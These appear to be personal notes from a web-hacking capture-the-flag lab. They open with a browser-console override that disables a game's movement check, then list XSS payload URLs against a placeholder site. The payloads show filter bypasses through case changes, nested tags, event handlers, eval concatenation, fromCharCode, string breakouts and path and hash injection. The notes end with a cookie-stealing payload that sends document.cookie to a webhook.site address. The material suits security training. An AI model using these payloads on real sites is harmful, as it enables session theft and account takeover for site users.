Write an updated Function (similar to the original) that doesnt do a rule-check
function canMoveTo(destX, destY) {
var imgData = context.getImageData(destX, destY, 15, 15);
var data = imgData.data;
var canMove = 1; // 1 means: the rectangle can move
return canMove;
}
Console Tab > Paste your 'function' there, and click 'run'!
Now you can move anywhere you want!
XSS
Javascript Injections (also: )
Goal is to pop an alert
Tricks to Avoid filters that might:
Block 'script' but not 'sCript'
Trim <script> but not recursive <sc<script>ript>
Blacklisted but can still create an error that Pops
Block 'alert' but can concat using 'eval'
Block 'alert' but allow String fromCharCode
Inject new JavaSript using 'Inspect Elements'
Mistake in code allows us to trust index.php
--------------------
http://abc.so/index.php?name=hack
http://abc.so/index.php?name=hack<script>
http://abc.so/index.php?name=hack<script></script>
http://abc.so/index.php?name=hack<h1>TEST</h1>
http://abc.so/index.php?name=hack<script>alert(1)</script>
http://abc.so/index.php?name=hack<script>alert('flag')</script>
--------------------
http://abc.so/index.php?name=hack%3Cscript%3Ealert(%27flag%27)%3C/script%3E
http://abc.so/index.php?name=hack<sc<script>ript>alert('flag')</sc</script>ript>
--------------------
http://abc.so/index.php?name=hack<a href='javascript:alert(1)'>test</a>
http://abc.so/index.php?name=hack<a onmouseover='alert(1)'>test</a>
http://abc.so/index.php?name=hack<img src="zzz.jpg" onerror='alert('flag')'></img>
http://abc.so/index.php?name=hack%3Cimg%20src=%22zzz.jpg%22%20onerror=%27alert(flag)%27%3E%3C/img%3E
--------------------
http://abc.so/index.php?name=hack<script>eval("al"+"ert(flag)")</script>
http://abc.so/index.php?name=hack<script>eval("al"%2b"ert(flag)")</script>
String.fromCharCode(97,108,101,114,116,40,49,41) ..."alert(1)"
--------------------
Inspect Elements
Inject an alert into the existing javascript!
<div class="row">
<div class="col-lg-12">
<h1>XSS</h1>
<p>Welcome!
<script>
var $a= "hacker";
</script>
</p>
http://abc.so/index.php?name=";alert(1);var a=" ..works
http://abc.so/index.php?name=";alert(1);" ..works
http://abc.so/index.php?name=";alert('flag');" ..works
--------------------
http://abc.so/index.php?name=";alert('flag');" ..err
http://abc.so/index.php?name=';alert('flag');' ..works
http://abc.so/index.php?name=%27;alert(%27flag%27);%27 ..win!
--------------------
Mistake in the code is trusting index.php
So we send index.php/somethingelse .. at the end, to fire a script!
http://abc.so/index.php/hello"><script>alert(1)</script>
http://abc.so/index.php/hello%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://abcl.so/index.php/hello"><script>alert('flag')<script>
--------------------
decodeURIComponent
Browsers have this issue fixed (used to work often)
http://abc.so/index.php#hacker
http://abc.so/index.php#<script>alert(1)</script>
http://abc.so/index.php#<script>alert('flag')</script>
--------------------
Cookie Grab Flag
http://abc.so/index.php?name=hack
http://abc.so/index.php?name=<script>alert(1)</script> ..ok
<img srv="https://myserver/?c=COOKIE" /> ..want this cookie
<script>document.write('<img srv="https://myserver/?c='+document.cookie+'" />')</script>
http://abc.so/index.php?name=<script>document.write('<img src="https://myserver/?c='%2bdocument.cookie%2b'" />')</script>
http://abc.so/index.php?name=<script>document.write('<img src="http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff/?c='%2bdocument.cookie%2b'" />')</script>
http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff
http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff?c=SECRET%3flag